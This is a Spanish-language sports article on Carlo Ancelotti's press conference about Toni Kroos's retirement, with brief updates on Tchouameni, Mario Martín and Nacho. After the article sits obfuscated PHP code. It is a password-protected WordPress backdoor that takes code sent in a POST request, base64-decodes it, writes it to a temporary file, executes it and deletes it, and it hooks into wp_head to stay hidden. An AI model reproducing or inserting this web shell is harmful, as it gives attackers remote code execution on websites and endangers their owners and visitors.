“Kroos es un hombre con huevos”

Ancelotti compareció ante los medios en la previa del duelo ante el Betis y explicó sus sensaciones en el adiós de Kroos: “Es casi imposible reemplazarle”.

La última conferencia de Prensa de Ancelotti para esta Liga 2023-24 que termina este fin de semana orbitó sobre el adiós de una leyenda del club: Toni Kroos. “No creo que haya sido una decisión complicada para él”, aseguró Carletto.“Los jugadores veteranos, las leyendas, tienen que elegir su destino. Toni ha tomado esa decisión y hay que respetarla. Hay que despedirlo lo mejor que podamos. Respeto su decisión, es la de un hombre con huevos”

La posibilidad de encontrar un futbolista parecido a Toni en el fútbol mundial. “Reemplazar a alguien así es casi imposible, pero esta plantilla tiene recursos en los jóvenes para que tomen la responsabilidad y sigan el camino marcado estos últimos diez años. Cada año pierde piezas, pero no pierde el ambiente, la actitud y el compromiso, tienen que mantener el ambiente limpio que hay. Depende de cada uno, pero no creo que haya sido una decisión complicada para él”.

¿Habló con el alemán? “Estaba convencido. Despedirse así sería lo ideal. Luego tienes que tener el coraje para hacerlo y respeto mucho lo que ha hecho. Una de sus cualidades técnicas es muy complicado encontrarlo, no es lo que estamos pensando. Pensamos en preparar la final para ganarla. Intentar hacerle cambiar de idea no era sencillo. No hubo lágrimas”.

¿Por qué Kroos es único? “Un rendimiento muy alto y muy continuado, sin bajas. Uno de los pocos que sabe manejar los tiempos de los partidos con la posesión. Su acierto en el pase es único. Ha aportado mucho al fútbol, es uno de los mejores medios de la historia”.

La lesión de Tchouameni. “Está descartado para la final, pero llegará para la Eurocopa”.

Mario Martín, si puede quedarse en la plantilla. “Está progresando muy bien, puede estar en la plantilla sin problema, tiene calidad y buena actitud. Él, como otros canteranos, podemos pensar en un futuro que estará en el primer equipo”.

¿Nacho finalmente podría quedarse? “Él no ha decidido todavía, estamos esperando, pero no tenemos prisa. Tras la temporada podrá elegir qué quiere hacer la próxima temporada. Ahora su idea es intentar ganar la Quince”.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}